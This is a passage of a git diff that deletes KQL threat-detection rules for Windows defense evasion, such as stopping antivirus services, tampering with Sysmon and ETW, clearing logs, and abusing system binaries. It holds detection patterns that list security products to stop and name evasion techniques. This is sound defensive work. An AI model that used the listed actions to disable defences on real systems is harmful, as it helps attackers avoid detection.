ProcessCommandLine contains "McAfeeFramework" or ProcessCommandLine contains "MCAFEETOMCATSRV530" or ProcessCommandLine contains "McShield" or ProcessCommandLine contains "McTaskManager" or ProcessCommandLine contains "mfefire" or ProcessCommandLine contains "mfemms" or ProcessCommandLine contains "mfevto" or ProcessCommandLine contains "mfevtp" or ProcessCommandLine contains "mfewc" or ProcessCommandLine contains "MMS" or ProcessCommandLine contains "mozyprobackup" or ProcessCommandLine contains "MsDtsServer" or ProcessCommandLine contains "MSExchange" or ProcessCommandLine contains "msftesq1SPROO" or ProcessCommandLine contains "msftesql$PROD" or ProcessCommandLine contains "MSOLAP$SQL_2008" or ProcessCommandLine contains "MSOLAP$SYSTEM_BGC" or ProcessCommandLine contains "MSOLAP$TPS" or ProcessCommandLine contains "MSOLAP$TPSAMA" or ProcessCommandLine contains "MSOLAPSTPS" or ProcessCommandLine contains "MSOLAPSTPSAMA" or ProcessCommandLine contains "mssecflt" or ProcessCommandLine contains "MSSQ!I.SPROFXENGAGEMEHT" or ProcessCommandLine contains "MSSQ0SHAREPOINT" or ProcessCommandLine contains "MSSQ0SOPHOS" or ProcessCommandLine contains "MSSQL" or ProcessCommandLine contains "MySQL" or ProcessCommandLine contains "NanoServiceMain" or ProcessCommandLine contains "NetMsmqActivator" or ProcessCommandLine contains "ntrtscan" or ProcessCommandLine contains "ofcservice" or ProcessCommandLine contains "Online Protection System" or ProcessCommandLine contains "OracleClientCache80" or ProcessCommandLine contains "PandaAetherAgent" or ProcessCommandLine contains "PccNTUpd" or ProcessCommandLine contains "PDVFSService" or ProcessCommandLine contains "POP3Svc" or ProcessCommandLine contains "POVFSService" or ProcessCommandLine contains "PSUAService" or ProcessCommandLine contains "Quick Update Service" or ProcessCommandLine contains "RepairService" or ProcessCommandLine contains "ReportServer" or ProcessCommandLine contains "ReportServer$" or ProcessCommandLine contains "RESvc" or ProcessCommandLine contains "RpcEptMapper" or ProcessCommandLine contains "sacsvr" or ProcessCommandLine contains "SamSs" or ProcessCommandLine contains "SAVAdminService" or ProcessCommandLine contains "SAVService" or ProcessCommandLine contains "ScSecSvc" or ProcessCommandLine contains "SDRSVC" or ProcessCommandLine contains "sense" or ProcessCommandLine contains "SentinelAgent" or ProcessCommandLine contains "SentinelHelperService" or ProcessCommandLine contains "SepMasterService" or ProcessCommandLine contains "ShMonitor" or ProcessCommandLine contains "Smcinst" or ProcessCommandLine contains "SmcService" or ProcessCommandLine contains "SMTPSvc" or ProcessCommandLine contains "SNAC" or ProcessCommandLine contains "SntpService" or ProcessCommandLine contains "Sophos" or ProcessCommandLine contains "SQ1SafeOLRService" or ProcessCommandLine contains "SQL Backups" or ProcessCommandLine contains "SQL Server" or ProcessCommandLine contains "SQLAgent" or ProcessCommandLine contains "SQLBrowser" or ProcessCommandLine contains "SQLsafe" or ProcessCommandLine contains "SQLSERVERAGENT" or ProcessCommandLine contains "SQLTELEMETRY" or ProcessCommandLine contains "SQLWriter" or ProcessCommandLine contains "SSISTELEMETRY130" or ProcessCommandLine contains "SstpSvc" or ProcessCommandLine contains "svcGenericHost" or ProcessCommandLine contains "swc_service" or ProcessCommandLine contains "swi_filter" or ProcessCommandLine contains "swi_service" or ProcessCommandLine contains "swi_update" or ProcessCommandLine contains "Symantec" or ProcessCommandLine contains "Telemetryserver" or ProcessCommandLine contains "ThreatLockerService" or ProcessCommandLine contains "TMBMServer" or ProcessCommandLine contains "TmCCSF" or ProcessCommandLine contains "TmFilter" or ProcessCommandLine contains "TMiCRCScanService" or ProcessCommandLine contains "tmlisten" or ProcessCommandLine contains "TMLWCSService" or ProcessCommandLine contains "TmPfw" or ProcessCommandLine contains "TmPreFilter" or ProcessCommandLine contains "TmProxy" or ProcessCommandLine contains "TMSmartRelayService" or ProcessCommandLine contains "tmusa" or ProcessCommandLine contains "Trend Micro Deep Security Manager" or ProcessCommandLine contains "TrueKey" or ProcessCommandLine contains "UI0Detect" or ProcessCommandLine contains "UTODetect" or ProcessCommandLine contains "Veeam" or ProcessCommandLine contains "VeeamDeploySvc" or ProcessCommandLine contains "Veritas System Recovery" or ProcessCommandLine contains "VSApiNt" or ProcessCommandLine contains "VSS" or ProcessCommandLine contains "W3Svc" or ProcessCommandLine contains "wbengine" or ProcessCommandLine contains "WdNisSvc" or ProcessCommandLine contains "WeanClOudSve" or ProcessCommandLine contains "Weems JY" or ProcessCommandLine contains "WinDefend" or ProcessCommandLine contains "wozyprobackup" or ProcessCommandLine contains "WRSVC" or ProcessCommandLine contains "Zoolz 2 Service") and ((ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))) or ((ProcessCommandLine contains "Stop-Service " or ProcessCommandLine contains "Remove-Service ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) or ((ProcessCommandLine contains " stop " or ProcessCommandLine contains " delete " or ProcessCommandLine contains " pause ") and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql b/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql deleted file mode 100644 index 3a8d740e..00000000 --- a/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/02/11 -// Level: high -// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions -// Tags: attack.defense_evasion, attack.t1562.001, attack.t1070.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "stop " or ProcessCommandLine contains "delete ") and (FolderPath endswith "\\logman.exe" or ProcessVersionInfoOriginalFileName =~ "Logman.exe") and (ProcessCommandLine contains "Circular Kernel Context Logger" or ProcessCommandLine contains "EventLog-" or ProcessCommandLine contains "SYSMON TRACE" or ProcessCommandLine contains "SysmonDnsEtwSession") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql b/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql deleted file mode 100644 index 1d0f27c0..00000000 --- a/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/26 -// Level: high -// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags - -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where (ProcessCommandLine endswith "Wuauclt" or ProcessCommandLine endswith "Wuauclt.exe") and (FolderPath endswith "\\Wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "Wuauclt.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql b/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql deleted file mode 100644 index dbebbd92..00000000 --- a/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects suspicious and uncommon child processes of WmiPrvSE -// Tags: attack.execution, attack.defense_evasion, attack.t1047, attack.t1204.002, attack.t1218.010 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql b/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql deleted file mode 100644 index 68be0887..00000000 --- a/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/06/04 -// Level: medium -// Description: Detects a suspicious call to the user32.dll function that locks the user workstation -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "user32.dll," and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\cmd.exe" and ProcessCommandLine contains "LockWorkStation" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql b/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql deleted file mode 100644 index 508c2628..00000000 --- a/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/23 -// Level: medium -// Description: Detect use of X509Enrollment -// Tags: attack.defense_evasion, attack.t1553.004 -DeviceProcessEvents -| where ProcessCommandLine contains "X509Enrollment.CBinaryConverter" or ProcessCommandLine contains "884e2002-217d-11da-b2a4-000e7bbb2b09" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql b/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql deleted file mode 100644 index f68123c0..00000000 --- a/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali -// Date: 2018/09/05 -// Level: medium -// Description: Detects presence of a potentially xor encoded powershell command -// Tags: attack.defense_evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_ZipExec_Execution.kql b/Defense Evasion/Suspicious_ZipExec_Execution.kql deleted file mode 100644 index 59378b3b..00000000 --- a/Defense Evasion/Suspicious_ZipExec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/11/07 -// Level: medium -// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip") \ No newline at end of file diff --git a/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql b/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql deleted file mode 100644 index b49c1f51..00000000 --- a/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/12 -// Level: medium -// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains "\"n; " and (FolderPath endswith "\\SyncAppvPublishingServer.exe" or ProcessVersionInfoOriginalFileName =~ "syncappvpublishingserver.exe") \ No newline at end of file diff --git a/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql b/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql deleted file mode 100644 index 2b772b2e..00000000 --- a/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/16 -// Level: medium -// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs -// Tags: attack.defense_evasion, attack.t1218, attack.t1216 -DeviceProcessEvents -| where ProcessCommandLine contains "\\SyncAppvPublishingServer.vbs" and ProcessCommandLine contains ";" \ No newline at end of file diff --git a/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql b/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql deleted file mode 100644 index 25f9908e..00000000 --- a/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/23 -// Level: high -// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ProcessCommandLine contains "msmpeng.exe" and (ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")) \ No newline at end of file diff --git a/Defense Evasion/Sysmon_Configuration_Update.kql b/Defense Evasion/Sysmon_Configuration_Update.kql deleted file mode 100644 index 1666200e..00000000 --- a/Defense Evasion/Sysmon_Configuration_Update.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/09 -// Level: medium -// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "/c") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor") \ No newline at end of file diff --git a/Defense Evasion/Sysmon_Driver_Altitude_Change.kql b/Defense Evasion/Sysmon_Driver_Altitude_Change.kql deleted file mode 100644 index 545223e7..00000000 --- a/Defense Evasion/Sysmon_Driver_Altitude_Change.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: B.Talebi -// Date: 2022/07/28 -// Level: high -// Description: Detects changes in Sysmon driver altitude value. -If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. - -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryKey contains "\\Services" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude" \ No newline at end of file diff --git a/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql b/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql deleted file mode 100644 index cd96d782..00000000 --- a/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Kirill Kiryanov, oscd.community -// Date: 2019/10/23 -// Level: high -// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe -// Tags: attack.defense_evasion, attack.t1070, attack.t1562, attack.t1562.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "unload" and ProcessCommandLine contains "sysmon") and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe") \ No newline at end of file diff --git a/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql b/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql deleted file mode 100644 index 9eaee852..00000000 --- a/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Anish Bogati -// Date: 2024/01/09 -// Level: medium -// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading. -// Tags: attack.defense_evasion, attack.t1036 -DeviceImageLoadEvents -| where (FolderPath endswith "\\hdwwiz.cpl" or FolderPath endswith "\\appwiz.cpl") and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Defense Evasion/System_File_Execution_Location_Anomaly.kql b/Defense Evasion/System_File_Execution_Location_Anomaly.kql deleted file mode 100644 index b5d45fc6..00000000 --- a/Defense Evasion/System_File_Execution_Location_Anomaly.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali -// Date: 2017/11/27 -// Level: high -// Description: Detects a Windows program executable started from a suspicious folder -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\wsmprovhost.exe" or FolderPath endswith "\\dfrgui.exe") and (not((((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or FolderPath contains "\\SystemRoot\\System32\\" or (FolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe"))) or (FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux")))) \ No newline at end of file diff --git a/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql b/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql deleted file mode 100644 index a84c588e..00000000 --- a/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/05 -// Level: high -// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ProcessCommandLine contains "Remove-MpPreference" and (ProcessCommandLine contains "-ControlledFolderAccessProtectedFolders " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Ids " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Actions " or ProcessCommandLine contains "-CheckForSignaturesBeforeRunningScan ") \ No newline at end of file diff --git a/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql b/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql deleted file mode 100644 index fcdeaa30..00000000 --- a/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/02 -// Level: high -// Description: Detects tamper attempts to sophos av functionality via registry key modification -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled" or RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled" or RegistryKey contains "\\Sophos\\SAVService\\TamperProtection\\Enabled") \ No newline at end of file diff --git a/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql b/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql deleted file mode 100644 index f8e74343..00000000 --- a/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Ilya Krestinichev, Florian Roth (Nextron Systems) -// Date: 2022/09/13 -// Level: high -// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection. -Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. -As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. - -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ProcessCommandLine contains "taskkill" and ProcessCommandLine contains " /F " and ProcessCommandLine contains " /IM " and ProcessCommandLine contains "ccSvcHst.exe" \ No newline at end of file diff --git a/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql b/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql deleted file mode 100644 index 1c869660..00000000 --- a/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/03/18 -// Level: high -// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where FolderPath endswith "\\taskmgr.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") \ No newline at end of file diff --git a/Defense Evasion/Tasks_Folder_Evasion.kql b/Defense Evasion/Tasks_Folder_Evasion.kql deleted file mode 100644 index 057c6541..00000000 --- a/Defense Evasion/Tasks_Folder_Evasion.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Sreeman -// Date: 2020/01/13 -// Level: high -// Description: The Tasks folder in system32 and syswow64 are globally writable paths. -Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application -in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr - -// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\") \ No newline at end of file diff --git a/Defense Evasion/TeamViewer_Log_File_Deleted.kql b/Defense Evasion/TeamViewer_Log_File_Deleted.kql deleted file mode 100644 index c78998d5..00000000 --- a/Defense Evasion/TeamViewer_Log_File_Deleted.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/16 -// Level: low -// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence -// Tags: attack.defense_evasion, attack.t1070.004 -DeviceFileEvents -| where (FolderPath contains "\\TeamViewer_" and FolderPath endswith ".log") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe")) \ No newline at end of file diff --git a/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql b/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql deleted file mode 100644 index 29fb1e22..00000000 --- a/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/10/19 -// Level: high -// Description: Detects the deletion of registry keys containing the MSTSC connection history -// Tags: attack.defense_evasion, attack.t1070, attack.t1112 -DeviceRegistryEvents -| where (ActionType =~ "DeleteValue" and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Default\\MRU") or ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Servers") \ No newline at end of file diff --git a/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql b/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql deleted file mode 100644 index 15cbb1e6..00000000 --- a/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\")))) \ No newline at end of file diff --git a/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql b/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql deleted file mode 100644 index 676604a5..00000000 --- a/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative -// Date: 2020/10/06 -// Level: high -// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. -// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\tttracer.exe" \ No newline at end of file diff --git a/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql b/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql deleted file mode 100644 index 856e72cb..00000000 --- a/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative -// Date: 2020/10/06 -// Level: high -// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. -// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001 -DeviceImageLoadEvents -| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll" \ No newline at end of file diff --git a/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql b/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql deleted file mode 100644 index 7d6b9bce..00000000 --- a/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/16 -// Level: medium -// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence -// Tags: attack.defense_evasion, attack.t1070 -DeviceFileEvents -| where (FolderPath contains "catalina." or FolderPath contains "_access_log." or FolderPath contains "localhost.") and (FolderPath contains "\\Tomcat" and FolderPath contains "\\logs\\") \ No newline at end of file diff --git a/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql b/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql deleted file mode 100644 index 5c5f14c7..00000000 --- a/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Trent 